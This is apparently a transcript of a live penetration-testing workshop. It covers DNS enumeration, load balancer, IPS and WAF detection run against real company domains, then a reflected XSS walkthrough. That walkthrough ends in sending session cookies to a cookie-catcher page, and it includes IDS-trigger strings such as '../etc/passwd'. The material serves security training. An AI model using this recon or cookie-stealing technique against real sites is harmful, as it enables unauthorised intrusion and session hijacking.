let's get going. Welcome to the Web App Pen Workshop. Well, I guess it's not Web App Pen, it's just Complete Pen, huh? So welcome to the Pentesting Workshop. Well, it's been a crazy week. Just like I was telling you guys before I started the recording, been up every night this week. It's been flat out crazy. So your courseware didn't get done. I'm going to get that to you probably in the next day or so. So I'll add that. You'll get it. It'll be a PDF file with pretty much everything that I go through today. So you're going to get the video at the end of this. You can have that. Then I'm going to take everything that I've done today and I'll put it in a PDF file, and that'll be your courseware that you guys can have. So let's just jump in. Let's just dive right in. So have your Ubuntu machine booted up and running. I like to log into it with PuTTY. For me, doing that just makes it nice and easy to copy and paste. So let's start like we're on the outside trying to work our way into a company. So we're on the outside. We've just been given our target IP range, and it's time for us to start attacking a host from the outside, attacking an entire subnet from the outside. So we need to start being concerned about what's out there in terms of targets, and then more importantly, what's out there in terms of defensive products, firewalls, IDSs, IPSs, anything that can mess with us, load balancers, web application firewalls, XML gateways. That's the kind of stuff that we need to start thinking about. So let's just dive right in. Okay, for me, you're going to see me run a tool called blind crawl. So I'm going to CD into my tools directory. Okay, so now that I'm in my tools directory, just to answer a couple of the questions that I see coming in, guys, the video is going to be sent out via email, and it'll be stored in GoToWebinar. So as soon as you get your confirmation email, you can just log back into GoToWebinar. You'll be able to grab the video. For those of you that are still having issues with the virtual machine download, at our breaks. We'll be taking breaks pretty much every hour. I'll try to handle those kinds of questions then. As far as what to connect to in PuTTY, when you boot your machine up, boot up your virtual machine, when you log into your virtual machine, just do an ifconfig inside of the virtual machine so you can figure out what address it's using. So you just go to the corner, type term, and then add a command prompt, just ifconfig like this. And then this is the address that I just SSH into with PuTTY, which is what I did here. You see it's 192.168.6.131 for me. Okay. All right, now for those of you asking, will I be giving out the video link? The video link will need to come via email because once I'm done with the class, it has to do like this rendering, and then it automatically uploads to GoToWebinar. Okay, so one of the tools I like to run is called a DNS brute forcer. I'll run blind crawl, and with blind crawl, what it's going to do is it's going to do a series of lookups for the common prefixes of names for the domain name. Adam, your question, it's the same password, username strategic sec, password strategic sec. Okay. Bogdan's question was, why do I not use backtrack? And backtrack and Kali Not that they're bad products, I just prefer not to. I guess I'm a little old school. I prefer to build my own virtual machine or my own Linux machine with all my tools on it. I personally think it's just too many tools in Kali Linux and Backtrack. I don't know any working pen tester who uses 1,500 tools. So, for me, I use somewhere between like 15 and 30 tools total, so that's pretty much all I need on my machine. We don't need the victim running at this point, Ken, so let's just get our machine fired up and let's just go from there. Okay, you should be starting to notice that a couple of different things are coming up, like www.motorola.com and ftp1.motorola.com. And again, what I'm doing here is I'm just trying to get a feel. I'm not trying to map all the targets. That's really not my goal right now. I'm just trying to get a feel for where stuff is located. Okay, my next question, C, is asking me, what OS do I recommend for pen testing? And all I can tell you there is anything you're comfortable with. The world does not mean you're supposed to. The world is not telling you that you have to use Backtrack. The world is not telling you that you have to use, CentOS or Ubuntu or whatever. You only need a few tools, to really do this job. And then whatever OS you're comfortable running them on is pretty much all you need. So if you want to drive a Mac, go ahead. Okay, next question. Adrian wants to know, what VPN do I use? You're talking for like personal stuff? For personal stuff, I generally use OpenVPN. Okay. Yep. All right, guys. So this tool's running a little bit slow. Yeah, it's running a little slow today. So it probably would have been better if I'd started this earlier. Let's see. Oh, Assad, you can run the one from DEF CON Insanity. That virtual machine is fine. There you go, Scott. Yeah, yours is ahead of mine. That's exactly what you should be seeing. Let me paste in what Scott has. Yeah, let's see. Charles has got the same thing where you can see all the results. That's good. Yeah, for some reason it's just a lot slower on my machine. I'll paste that in. You guys can see it. There you go. So you're noticing that it's coming up with www.motorola.com, ftp1.motorola.com, secure.motorola.com, 144.188.20.66, access.motorola.com, access2.motorola.com, email.motorola.com. And for me, these are great. Not because it's found every host in the environment, that's way too many, but, Motorola is a really good example because Motorola has, I think they have like 4 Class Bs, something like that. I mean, their network is freaking huge. So when you've got networks that big and you've just got, stuff scattered all over the place, the best thing you can do is just at least start getting an idea how big this network is and what subnets target hosts are in. For me, David, my Ubuntu machine is running natted. Maybe that's probably part of why it's running so slow, but I hope not. Okay, so now Saeed's question is, running something like blind crawl, does it really affect us in terms of being noisy? And generally, no. So what you're dealing with here is you're doing a lot of DNS enumeration. So you're not really doing a ton of scanning, sending lots and lots of packets at the target host. What you're really doing is just sending a lot of DNS queries. So if people have verbose monitoring of inbound DNS queries, then yeah, but you just really don't see a lot of that in today's production networks. Okay, the other thing that we can run is a tool called Fierce. I'm not going to cover that today, but Fierce is a really good tool for this kind of stuff, and the amount of information it gives is a lot more verbose. I'm going to kill this because it's just taking too long. Now, my favorite tool is gxfr.py. So you're going to see that I'm going to run this gxfr. Now, I want the domain name, so I'm going to give it Motorola. Now, it should want my Bing API key. Okay, now those of you who are familiar with tools like Fierce will automatically attempt a zone transfer. Okay, there's my API key, like that. Let's let this bad boy run. Oh, no way. Okay, my API key is valid. Let's go Oracle. Toss in the API key. Light them up. There we go. There we go. All right, so are you noticing that when I ran this against Oracle, and I threw in my API key, I got a ton of stuff. Look at all these hosts. Lots and lots and lots of hosts. That's awesome. So for me, this is just flat out great. And you can see all the different IP ranges that all these hosts are in. So for me, I would start sweeping these various subnets. So let's say the 141.146.9, the 137.254.17, the 23.64.102, the 198.55.95. These are all subnets that I would start going to look at, and I try and look at the entire subnet, see if there was stuff that I could find. Do I like tools like DNS Recon and the Harvester? And yeah, I do like them. Yeah, I do. I think they're pretty good. Okay, Lawrence, you want this workshop text file that I'm using? I'll be emailing that out as soon as class is done. So as soon as you get the video, the workshop text file will come out, and that way you can have all of the same file, all the exact same commands. But I'm pasting in the commands as I do them too. Mark, Bing lets you register for this API key, and it's free. So I think you get like, I don't know, like 10,000 queries for a month or something like that. Okay. Let's see. C wants to know, I'm not telnetting in, I'm actually SSHing in. He says, why don't you conduct from your pen test directly from a VM? I like to be able to copy and paste. Even on pen test today, I like to be able to copy and paste. So for me, it makes me a lot faster. I'm a lot less prone to mistakes. So to give you guys an example, to give you guys an example, if I got to do a pen test, I'll spend, the day before my pen test or the morning of my pen test, a pretty fair amount of time, getting a bunch of text files together with all of my commands and building out a text file. The same way that I did for your class. Like I built all this out in the last couple of hours for everything that I plan to cover today. So I just really work hard on trying to have my commands ready to go. It just makes me faster. I have a lot less mistakes. Some people, they do what I do. Other people, they do what are called click scripts. So you'll hear some pen testers say that, have all my scripts ready before I get ready to go on site. And what that means is all of their pen tester scripts that they run, everything that they do has been put into a shell script, Perl script, Python script, so it's just faster to use, ready to go. Okay. Okay, Raphael wants to know, do I have templates that I use in the real-world pen test? Yeah, sure. Sure. Adrian wants to know, do I trust tools that require an API key? Yeah, generally I do, especially from large companies like Bing and Microsoft and Google. That kind of stuff is usually pretty good. Why can't I copy and paste into the VM directly? As long as VMware Tools is loaded, I can. I certainly can. I just like having the white background with the black font. I think it's easier for students to see. Okay, let's move on a little bit. All right. You don't have a link for a working target. Okay, let me get to that in a second, Daniel. All right, so let's jump on. Now let's look at all these IP addresses that we found on Motorola or Oracle. Now I want you guys to check out a tool, and this tool is called IP Crawl. It's a really old tool, really old. Okay, so when you guys look at me running IP Crawl, can anybody tell me what's going on? What's happening when you see this IP Crawl tool run? There you go, Marty. Good, Adrian. Okay. So for every IP in this range, we're trying to do a DNS lookup on that host, right? We're trying to see if we can come up with a corresponding DNS name for that host. Normally we would ping sweep, right? We would say, okay, for every range that I found when I was trying to look up IPs, I would try to run a ping sweep. And ping sweeps, especially with Nmap, are usually pretty good. And the reason is because even though most people block ICMP, Nmap will also do a TCP ping to port 80 as well. So it'll try and send a send packet to port 80s on each host to see if it can reach stuff. And that's usually pretty good. When we get to situations where we have people not just blocking ICMP, but also blocking, port scans and all these other different types of things, for me, I really like being able to sorry guys, I got a little distracted trying to see a question. I really like being able to just do reverse lookups on all of the different IPs. I find, even though sometimes you run into stale records, I find that it's a pretty good way for me to figure out what's out there when there's defensive measures. So a lot of guys always ask that stuff. What about when there's defensive measures? What about when there's, all these different, firewalls, IDSs, IPSs, XML gateways? What do I do when there's all this different stuff out there because it's not letting me ping sweep the network? Oftentimes these tools are tuned to look for people running lots and lots of port scans. So DNS for me is kind of my go-to in that situation. Now, just like Raphael's mentioning right here, I like to do this the same way. I like to do the same thing using nmap with the SL. So lowercase s, capital L. Nmap calls it a list scan. Okay, so let me paste that in so you guys can see it. Okay. Now for me, I'm just going to go ahead and grep Oracle. Okay. All right. Now one of the questions I got is, what is the legality of zone transfers? Remember, if we're doing penetration testing, we should have written permission from the customer to do this. So there's no legal issues for us. Okay, there's no legal issues. Now, just being out there doing port scanning, there's the associated stuff with the legality of port scanning, but we're not doing any zone transfers in this class today. Okay. All right. So, let's say you've been sweeping the network, okay, and you're trying to find which hosts are reachable. Once you've found, here's all my targets for a particular subnet, what I like to do, let me try and fix my sound. Let's see. Once you've found all your target hosts for a particular subnet, what I like to do is I like to now go for testing for load balancing. For me, the load balancer stuff, especially customers with large networks, I tend to find that they have a lot of load balancing. Okay, it's out there. So what we want to do is let's just try some simple things. Let's try for like dig, google.com. You can give that a shot. Dig, google.com. And you're going to see that Google is one of the obvious places that's using load balancing. So this is what's called DNS load balancing, right? So for every domain name, for the one domain name, I should say, there are multiple IP addresses. We're going to call that DNS-based load balancing. Okay, now that we've done that, let's try and run lbd.sh. lbd.sh, the load balancer detection script, is a great script for figuring out if load balancing is available, or excuse me, is in use. Okay. All right, so you notice when we ran that, let's take a look. As soon as we ran this, here's what we ran. It comes back and it says, hey, did we find DNS load balancing? And the answer is yeah. So it's doing the first step is the functional equivalent of the dig command. So it found all these different IPs mapping to this one DNS name. After that, it looks for HTTP load balancing. Now with HTTP load balancing, you're going to make lots and lots of queries to the same host, to the same domain name rather, and see if there's fluctuation in the time that the site responds and points up. Fluctuations in time that the site gives back in its HTTP response. So if you get that, then you know that there's more than one host back there. So let's say right here, I've got 1439.57, 1439.57, 1439.57. If there was a 1439.71, then and then went right back to 1439.57, then I know that I'm communicating with more than one host out there. Okay. All right. Let's see. We've still got a couple of people asking about the. Still have a couple of people asking about the virtual machines, and I'll definitely get them to you. Like I said, let's wait for the next break, and then we'll try and see if there's a place I can put them. Okay. Yeah, Brian, the files that I send out will have links to all the tools and everything that I'm doing here. So now we have a person asking, hey, is the load balancer detection, is this detectable? So the answer is yes. Yeah, it really is. Let's see, Leon, if you're trying to use Kali Linux, pretty much everything I'm covering is in Kali. So if you want to use Kali or Backtrack, that'll certainly work for you. Just the file path to where the tools are, that's what's not going to work. So you'll just have to get the pathing right for the tools themselves. Okay. All right, let's jump on the next step. So my next favorite tool for load balancing is Halberd. So I'm going to use Halberd. I'm going to run it against Microsoft.com. Okay. Now, Drupal is asking a really good question. Why am I trying to figure out if load balancing is in use? For me, load balancing is one of the first things I try to figure out. As soon as I start doing my sweeps for the network to figure out what's out there, my very next step is to try and see if there's load balancing, because I don't want things to interfere with my scans later on. So you notice my first step is not to start port scanning. My first step is not to run Nessus. My first step is not to run Qualys or whatever your favorite vulnerability scanner is. That's not my first step. My first step is to get my targets, come up with the IPs that I'm going for. Then I start looking for defensive things. So right now I'm looking for load balancers. Although load balancers aren't necessarily a defensive measure, what tends to happen is they screw up my scan results. Because you can have, for example, it's very common to find people running different versions of servers behind a load balancer. So you'll see sometimes you scan it, it says it's IIS 7.5. Next time you scan it, it says it's IIS 7.0. Next time you scan it, it says it's IIS 6.0. Not uncommon at all. So now your vulnerability scan results are skewed. For me, if I know that there's load balancing in the area in play, then I can scan by IP address, or I can do other things to target a host specifically. Right, exactly. Mauricio's asking that question. It's beneficial to know if there's a load balancer there, because what you care about is not getting your scans jacked up. Okay. Darren's question, do I often find web application firewalls on load balancers? And the answer is yes, I do. Yes, I do. So a lot of load balancers, specifically things like F5 Big IP, using what's called the ASM, Application Security Module, often integrate their web application firewall rules into the load balancer. So yeah, you do run into this stuff a lot. And these are those things that you want to know up front. You want to be figuring this stuff out before you start scanning. You don't want to just light up your favorite vulnerability scanner and then turn around and find out that your results are all wrong. Okay, so that's Halberd. So that's load balancing. There's one more place that we can look for load balancing that I really like, and that is Netcraft. So let's go to news.netcraft.com. So here we're at news.netcraft.com, and what I'm going to do is I'm going to look for bankofamerica.com. So here I am, I've chosen bankofamerica.com. And you'll notice, now that I have it, bankofamerica.com, look at what's here. Okay, very, very interesting, guys. Very, very interesting. So we've definitely found that Bank of America is making heavy use of their load balancers, really heavy use of it. Okay. Our next question that we got is, now that we know that a load balancer is in play, what do we do about it? So if a load balancer is in play, the first thing that we need to know is, yes, there's a load balancer. What is it doing? Is it doing DNS load balancing? Is it doing HTTP load balancing? If it's DNS load balancing, like the case with Google, typo. So if it's DNS load balancing, like in the case with Google, then that's not a problem, because what we're going to do is we're just going to scan by the IP address instead of by the domain name. So if you're dealing with DNS-based load balancing, not an issue at all. If you're dealing with HTTP load balancing, it's going to be pretty tricky. What you're going to have to do is you're going to need to transition and focus on application layer attacks like SQL injection, cross-site scripting, those types of things. You're going to need to run your web app testing tools, your app scan, your WebSense, your Acunet, your Web Inspect, your Acunetics, and those types of tools, NetSparker. You're going to need to go for application vulnerabilities. Now, what we traditionally do is we ask the customer to place us in the same logical subnet as those hosts. So if they're running HTTP load balancing, we'll ask the customer, can you please place us in the same subnet as those targets so that we can scan them effectively. And the customer may or may not do it. I've run into plenty of customers who won't let you. They'll just say, no, you need to scan externally and see what you come up with. Okay, my next question is people asking about things like pfSense and F5 Big IP, and I think both of them are pretty good products. I haven't really seen a lot of pfSense out in production environments. You tend to see a lot of pfSense in like lab environments and smaller network type stuff. I like them both. I think they're pretty good. I know I use pfSense for some of the class stuff that I do, and then the ability to integrate it with Snort and all those kind of things and OpenVPN is really, really nice. So for me, pfSense, especially for like a small company, pretty handy, pretty handy. Okay. All right, let's go ahead, let's move on. All right, the next thing that I'm going to run is I'm going to run something called active filter detection. Active filter detection. So the concept behind active filter detection is to send lots and lots of traffic to a target host that looks like it's attack strings. And the easiest way to do that is to send several things that are the actual string in the IDS signature. So what you would do is you would say, okay, in the IDS signature, there is ... etc password. You would say that's the regex, the regular expression of that signature, right? What you want to do is you want to send that to the target. So I'm going to send just that to the target. Okay. All right, now let's see. That's going really slow. Let's see if my server's online. Okay. All right, there we go. It's finally working. I guess my server's just going a little slow. Okay. Yeah, Brian, all these tools are on the VM. If you need for me to try and, pull them off and put them in some sort of zip file, I'll definitely do that if that's what you need or want. Okay. All right. Now, guys, as you look at this, you see how it's just dot, dot, slash, Etsy, mont D. So that's the type of thing that you'd see in an IDS signature. So you look at this ls-al, it's the type of thing that you'd see in an IDS signature. So what you're doing is you're sending the exact string that's in an IDS signature to a target. And then what you're hoping for is if there's an IPS in play, intrusion prevention system, then what you should get is a reset ACK packet in return. The target is going to try to kill your connection. That's why it's going to send you a reset ACK packet. I'm telling this because it's just going so slow. I'm thinking it's because the bulk of you are running it against my server as well. Yeah, see, look, website's offline. Yeah, I'm under attack. Yeah, that's actually pretty bad because that whole Cloudflare thing is supposed to give me like DDoS protection, right? Yeah, that's right. You've definitely DDoSed the site. Yeah, 50 cow says it looks like it protected me by taking me offline, huh? Yeah, what a great test. Okay. Hmm. Okay, Mike's saying it's still showing as offline. Yeah. I don't know. I mean, I just logged into it, so I mean, the box is obviously on. But yeah, that many hosts trying to connect to it, that sucker's having some issues. Okay. Yay, my site's back. All right. Do I run Nginx or Apache? I actually run Apache. Okay, my next question was someone asking about next-gen firewalls, things like Palo Alto and stuff like that. Do I run into them on Pentest? And the answer is yes. When I do run into those things, the things that I've been running into is that they're really not that much different for me being the attacker running into a next-gen firewall. It's really not. The benefits of a next-gen firewall are for really discerning customers who need to do things like, for example, allow you to get to Facebook, allow their customers to get to Facebook, but not allow their customers to get to Facebook apps, as an example. So it's just got really granular rules that the next-gen firewall can do. But what I found is that most customers really aren't savvy enough to deploy a next-gen firewall very well. So there's lots of conflicting rules when people use them, especially things like Palo Alto. So on the outside, me scanning to get in, not much different. You know, it's not like the Palo Alto has like 50 million different IDS, IPS type features that are just going to flat out stop me. Not significantly that much different in that regard. Where they're different is granular rules. Like I said, Facebook apps is a good example. All right. Okay, so now you saw me run this. The next thing that I'm going to do is, what if there actually is an IPS in place? So if there actually is an IPS in place, you're going to see that what I look for is, if there is an IPS in place, does the IPS actually decrypt SSL traffic? So in a lot of cases, just because you have an intrusion prevention system, what a lot of people don't realize is that they're often not decrypting that SSL traffic prior to it passing the IDS or IPS. So essentially what's happening is, whenever you have HTTPS in your web servers, you have now blinded your own IDS. So let's take a look. So now if you look there, okay. All right, can you guys hear me okay now? Okay, good. Yeah, I thought we'd drop for a second. Okay, so now if you look here, you'll see that I'm sending this traffic, and this traffic goes into local port quadruple 8, and then it gets pushed into this SSL proxy script. Now this SSL proxy script pushes the traffic through OpenSSL and then directly onto my website. Okay. So with that, now I'm going to run that active filter detection tool again, but I'm running it this way. Can anybody tell me what this is accomplishing? What's being accomplished by running it this way? There you go. We're tunneling SSL. So now I'm doing the exact same test, but this time I'm actually trying to send the traffic encrypted to my target to see if the IPS actually blocks me. Okay, and this is a way that we can figure out if they're decrypting the traffic prior to it passing the IPS. And then you don't see very many customers who purchase an IPS and then buy an SSL accelerator. So what the SSL accelerator would do is you would terminate your SSL connection in front of your web server. And then immediately after that, that's where you have the IPS. And then after that, you have the actual web server. So you just don't run into that many people who actually do that. So when you see IPS is deployed, okay, so let's say you have a packer, and then what it should hit is your SSL accelerator. Then it should hit your IPS. Then it should actually get to your web server. Okay? And because people don't terminate SSL here, this is why you run into cases where even though a person has deployed an IPS, they're not getting very much benefit out of it. And then the other thing that you run into is just certificate management is a pain in the butt, right? Having to move the certificates for each web server, to something else makes it very, very very difficult. You just don't run into admins who are willing to go to all of that headache there. Now, when a person is using something like SSL strip, that's the opposite. What you're trying to do, you're going to use SSL strip when you're attacking a person who's trying to communicate over SSL with the web server. You want to coerce him, because there's a social engineering component. You want to coerce him into thinking that he's making an encrypted connection to the target web server when he's really not. Okay, so that should be our next piece. We got one more component to do. So what we want to do is we want to cd to WAF loop. So you want to cd into the WAF loop directory. And WAF loop is a tool. WAF loop is a tool that people use to try and determine if there's a web application firewall in play. So it's a good way to figure out. Oh, I'm sorry, Marty. I didn't know that I killed your. I didn't know that I killed your download when I restarted that server. Sorry about that. Okay. So WAF loop is a good tool to use when you're trying to figure out if there's a web application firewall in play. So let's run WAF loop, and let's run it against, let's say, strategicsec.com. Sorry, Lawrence. Didn't know I did that to you guys. Oh, no. It says it's down. Oh, really? Let's see. Lost one on this again. How about Imperva? Okay. Wow, I would have never guessed that Imperva site is using some sort of web application firewall. Okay. Now, really interesting here, right? It's letting us know that they blocked us, but they blocked it at that connection and packet level. So not only is there a firewall, but there may potentially even be an IPS there as well. Okay, so are all the tools introduced here open source? Every tool that I'm using as an attack tool, Satoshi, yes, is an open source tool. So yeah, I'm going to cover all open source stuff. I won't be covering any commercial tools today. Okay, I'm just kind of cleaning up my questions here. All right, guys, that's 1 hour. I say we take a break. So I say let's take 10 minutes. Let's go for the quick bio break. And let's get back in here. Let's try and handle people who are having, issues downloading virtual machines and stuff like that. Take care of that stuff right now. Okay. All right, let's give it a break, guys. I'll see you in 10 minutes. Let me grab a quick drink and do the bio thing. I'll come back and I'll start helping people with virtual machines. Okay, coming back from break. Can you guys hear me? Sweet. Huh. Yeah, Proxy Finder, I generally don't even run that. It's just so slow. I usually throw that in my cron.daily and have it run daily. Excuse me. All right, guys, let's get back on this. You shouldn't really need, Tiffany, the root password, but if you do, what you can do in a command prompt is you can just do sudo/bin/bash like this, and then that should be able to get you into admin access. It'll drop you to a root shell so you can do whatever you want. Some people do like sudo su. Okay. All right, I think we've got somebody who's uploading the VMs. Didn't somebody say they were uploading the VMs to another server? Okay, yeah, Stefan says 30 more minutes. Let's see. We can probably throw this up on. It's been. Okay, so for those of you who wanted the workshop.txt file that I'm working with right now, this is the one I'm using right now. Again, I think it would be better to kind of wait until the end of class because I'll be updating this for any changes that I have to make. But yeah, if you're trying to follow along, this should kind of help you out. Okay. Yeah, just that yeah, you're right. When I came in earlier, I told everybody I didn't get all the rest of those files out. So the courseware and all that won't come out for another couple of days. So yeah, all everyone got was the virtual machine links. Okay. All right, Leon, I'm going to throw this link to everybody. Thanks, Leon. I really appreciate it. Leon, I really appreciate you helping out, bud. Okay. Yeah, Riff, this link is the link for the workshop.txt file. This is it right here. It's just uploading it to Pastebin right now. Aren't there any Linuxable GoToWebinar clients? Oh, I don't know about that. That's going to be a tough one. I really doubt it. I really doubt it. Let's see, as far as the Windows 7 one, I don't know if anyone's able to get that uploaded to anything. Yeah. Yeah, there's just not much love for Linux these days, man. Not in the desktop arena. Okay. Yeah, if anyone can get that Windows 7 virtual machine put up somewhere, I think that would really help. I think a lot of people would really like to be able to grab that too. Okay, so one of the questions I got earlier was, do you have a place that you can go for updates to LaughRoof? And Sandro, a good buddy of mine, the guy who's the original developer of the tool, I haven't seen him update the tool lately. So I would say you're really going to have to get down in there and write your own if that's the way you want to go. There's not a lot of support for the tool and not a lot of updates for the tool, but I really think it's pretty handy. I use it. I still use it, even though it is a little outdated. I still use it. Jason, thanks for the love, man. Yeah, thanks for joining Pentester Lab. Thanks for joining Pentester Academy. No, Vivek and I are not partners. We're just really good friends. I like the guy. Vivek is that's a real cool dude, man. That's a real cool dude, and just disgustingly smart. Like so smart you feel like an idiot talking to the guy. He never tries to make you feel like an idiot, but I don't think there's anything in the security realm that Vivek doesn't know. Absolutely love that guy. Just a great guy. So let's see. Oh man, we got all kinds of love going on in here. Let's see. Shout out to RS. Shout out from ATL SecCon. Oh man. Okay. Man, there's a lot going on. Hey man, it's good to see you guys are up here, man. I really appreciate you guys hanging out. And anything I can do to try and make things easy for you guys, and any way I can help, man, let me know. Nothing but love for the guys out there in Hack Miami. Nothing but love for these guys at RS. Really appreciate that. Shout out to all of you guys. Nothing but love. Very much appreciated. All right. All right. Well, 757 in the house. Okay. Looks like we're doing pretty good. Pretty good. All right, guys, let's just get back in this. Let's really get to. Yeah, we're looking for someone to upload that Windows 7. I don't have another place I can upload it to very quickly. You know, I could probably throw it on like Amazon EC2 or something like that. Okay, looks like Leon's got it. Okay, guys, let's start playing with some web app stuff. Uh, I don't even know if torrents are the way to go. For the future, do you guys really think a torrent would be the way to go? I mean, we'd have to have a lot of people seed it. Yeah, my concern with going the torrent route is just you'd have to have a lot of people seeding it. My gut is saying the better way to go would be something like Amazon S3. Okay, Mike is saying that the better way to go is a download manager. Yeah, probably Amazon S3. How many people are currently in the class? A little over 300. Let's see, C is saying, what's the difference between the paid courses and the free webinar, workshop type stuff? Not much, to be honest. The free stuff that I'm doing, I just made a promise to some friends that I was going to do one free thing per month, be it a webinar, be it a workshop, something. I'm going to try to do one free thing per month. As far as what I do in the classes, the classes are more in-depth. The classes get lab access. And a pretty healthy chunk of the class students are in this workshop right now. I live off this now. I'm really kind of transitioning into where I'm just teaching my own stuff. And, this is how I make my income. But I don't want to be, I don't want to be, I don't know how to say this, but I didn't pay to learn this stuff. You know what I mean? People helped me. I had a lot of really good mentors. I had a lot of people who really sat down and took the time. You know what I'm saying? So I want to continue to do things for free. I want to make sure that I keep the classes affordable. So that's what I'm trying to do. I'm trying to keep the classes low cost. I'm trying to make sure that I give value and keep some stuff affordable. And it's kind of the only way that I know how to get back. I don't write O-days, and I don't, this is what I do, So that's it. Oh, thanks, Stefan. Good love, man. I appreciate that. So let's see. Okay, it looks like Ty has got the Windows 7 image out there, too. Yeah, I appreciate you guys saying all the nice things. That just makes me feel good. So, if you think about guys like Vivek, what Vivek is doing at SecurityTube, what I'm trying to do here, there are people out there trying to, like you said, like one guy said, not milk you. Don't get me wrong. I mean, I do make my income off this, but I'm not trying to be a prick and just suck you dry or anything like that. Oh, great, Lewis. Thanks for joining Pentester Academy. I'll make sure that I shoot the word over to the deck that you're happy with it. All right, guys, let's get started messing with some of the web app stuff. All right, so what you're going to see is I'm going to go to this website. So just a really quick demo on cross-site scripting. Now, I know some of you are probably pretty comfortable with cross-site scripting, but the majority of people that I run into whenever we start talking about cross-site scripting kind of have an idea what it is, but really struggle to articulate it and really struggle to apply it. So to me, even though it's going to be really basic to do it this way, I found that it really helps people get a better understanding of what's going on in cross-site scripting, and then they can talk about the actual impact of cross-site scripting. And when you're on a penetration test, you know, it's really not about how good you are at hacking, it's about how good you are at helping the customer understand the problem. And if the customer can understand the problem, he's more apt to do something about it, and that's the real goal of pen testing. So let's get in here and let's do this. Okay, so you've got this website, and what you've got is a website with a generic search box that reflects stuff back. So what I'm going to do is I'm going to take this text, there we go. So here's the address that you guys should try to go to. Now once you're there, inside of the search box, place this in it. Okay, the script alert XSS. It's the most common. You know, then you hit search, and it should come up. There you go. So there's our cross-site scripting. And you know, generally when people see this, the typical response is, so? You know, seeing that you can make a window pop up really doesn't have a whole lot of impact on people. It's not like, oh my God, you know, what's going on? And, you know, oh my God, batten down the hatches, right? So yeah, that's really not where it's going, but it really is a real threat. So what can we do about it? So let's say we go here. Let's go back. So let's hit the back button, and let's try and see if we can figure out why this is a real threat. So I'm going to go to the very next step, and you notice in here I'm going to put in a variation of the same thing, right? So this time I'm going to throw in document.cookie. So it's the same script alert. Now the script alert causes the pop-up. Script alert causes the pop-up. And then the document dot whatever, right? Right. Whenever you interact with JavaScript, you can reference things by using this document. So document dot, you know, right, document dot cookie, document dot, you know, whatever. It's going to be how you reference things inside of JavaScript. So here I asked for document.cookie, and you're seeing that it's allowing me to get this pop-up again. Instead of just popping up some text, this time we want to pop up the actual session cookie. So when you have a customer who's interacting with a website, HTTP is stateless. So from one packet to the next, the web server really doesn't know who you are. So it uses session cookie to figure out who you are and where you are in the site. So if I go to a website, I issue my username and password. As I browse the website, every single page that I go to in the website, the web server needs to read my cookie to know who I am. So now if a person were to actually steal my session cookie, then what you're going to run into is, okay, now this person can pretend to be me because the web server is only using this session cookie to figure out who I am. So let's go back. Okay, and the real key here is, let's just think about this, right? Can your browser access and modify files on your file system? And the answer is yeah, of course it can. So if your browser can access files and execute programs, like think about it, if you browse the internet and you go to a web page that contains a PDF, you know, will your browser launch your PDF viewer and then allow you to read that PDF? You know, the answer is yeah. So it's allowing you to execute programs. So if that's the case, then what you're dealing with is your web browser is effectively a command prompt. You know, not literally, but effectively, it's a command prompt. So everywhere you go on the internet, you're basically giving that website that you go to a command shell on your machine. If you look at it in that context, you'd be a lot more reluctant to do some of the things that you do on the internet, potentially. So what's actually happening? Your web browser is literally just starting at the top of the page and reading all the way down to the bottom of the page. I mean, that's what it does. It just renders whatever HTML it finds in JavaScript and VBScript, of course, but it just starts at the top, goes all the way down, and renders everything. Now, with user-generated content, you end up having situations where all of the content on a web page may not necessarily be from that website. So your browser doesn't know where the code that's on the site came from. It just knows, hey, I'm on this site, read from the top of the page to the bottom of the page. So now, what about places that allow us to have user-generated content? Things like a search box, a blog, forum, a guest book, a contact us form, a feedback form, instant messenger, chat. These are the things that allow user-generated content. And when you have user-generated content, you have the potential for people to insert script code. Now remember, if we look, we have HTML, then here's a script that's good, here's another script that's good, immediately followed by a script that's bad, inserted by a user. Your browser can't tell. Your browser just runs it. And that's the real risk with dynamically generated websites and threats like cross-site scripting. You often cannot control it. You can have a completely patched browser, completely patched machine running the latest version of Internet Explorer and all the patches applied. If the website's vulnerable to cross-site scripting, an attacker can inject script code, and then he can get access to your session data, and then potentially impersonate you, potentially act as you on the website that you're going to. So if a person can get that session ID, then that's where stuff really, really gets bad because, you know, remember, SQL injection attacks the server. Cross-site scripting actually attacks the user. The user's at risk. Okay? So the user's usually going to try to capture your session ID and then send it across site. So send it to another server and use that stolen session ID to log in as you. That's right. Who's the master? Sure enough. Okay, so if we look at the next step, we see here in step 4, it says that we're going to do this document.location. Now before, everything that we were doing, we were trying to get an alert box to pop up. So when you're doing cross-site scripting, when you're testing for it, generally you just want a pop-up. If you want to actually utilize it, then you're going to want to do these next couple of steps, right? So the first pop-up box, the script alert, this is XSS, that just proves that code execution is possible. The second time we did it, we actually tried to prove that we had access to the actual session cookie. The third time, what we're doing right now, I'm going to do a document.location, and I'm going to redirect the cookie somewhere else. So I'm going to send that cookie to a cookie catcher page. And there's the session ID, and we just shot it over to another website, to this cookie catcher. So now what an attacker would do, an attacker would try to take these session cookies If you look here, these are all of the session cookies that we've collected from people clicking on these links. So there's just tons and tons and tons of them, right? Okay, now this is not considered a remote file include. I'll cover that in a little while. So this is just considered traditional cross-site scripting. So I'm able to take a session cookie, send it from location A to location B. Yeah, Lawrence, that's exactly what's being done. That's exactly what's being done. So if you're running a tool like WebInspect, Acunetics, something like that, and it identifies cross-site scripting, it's found a place where script execution is possible that can get an alert pop-up box. Now, they're generally not going to do all the rest of the steps. So if you look right here where we just did the script alert, this is where your vulnerability scanner stops, right? Your vulnerability scanner just sees if you can get code execution in the browser. Then what you as the tester are going to do is you're going to say, okay, yes, you have cross-site scripting, but if they have like secure cookies or HTTP only and these other types of security controls enabled, cross-site scripting may not necessarily be as bad. Keyword, may not. So the step that your vulnerability scanner does not do is it doesn't do this next step, step 3. Does it have access to the cookie? Okay, so if you can access the cookie, now you can access what the web server is using to figure out who you are. And then the next step is to send that cookie somewhere else. Can I send it to another website and actually use it? So now let's say we have, for example, I'll do this in Internet Explorer. It's a lot easier to do in Internet Explorer. So I'm going to, whoops, not what I wanted to do. Explorer. Let's explore.exe with it. There we go. Okay, so I'm going to open up Internet Explorer. I'm going to go to Amazon.com. So here I am on Mike. Yeah, can you create a cookie stealer locally? That's exactly what I did on this website. It just sends it to the same website. It is local. And if you guys want the code to do that, I can give you that. Okay. All right, so let's say I go to Amazon. I'm on Amazon. Let's say I go to my cart. So go to the cart. All right, so here I am on the shopping cart part of Amazon. And then right here, I'm just going to say JavaScript, :void, document.write, document.cookie, 2 parentheses, hit enter. There's my session ID. Okay. So let me back you up here. So that's me on the cart. Remember, I'm doing this in Internet Explorer, guys. Then, when I 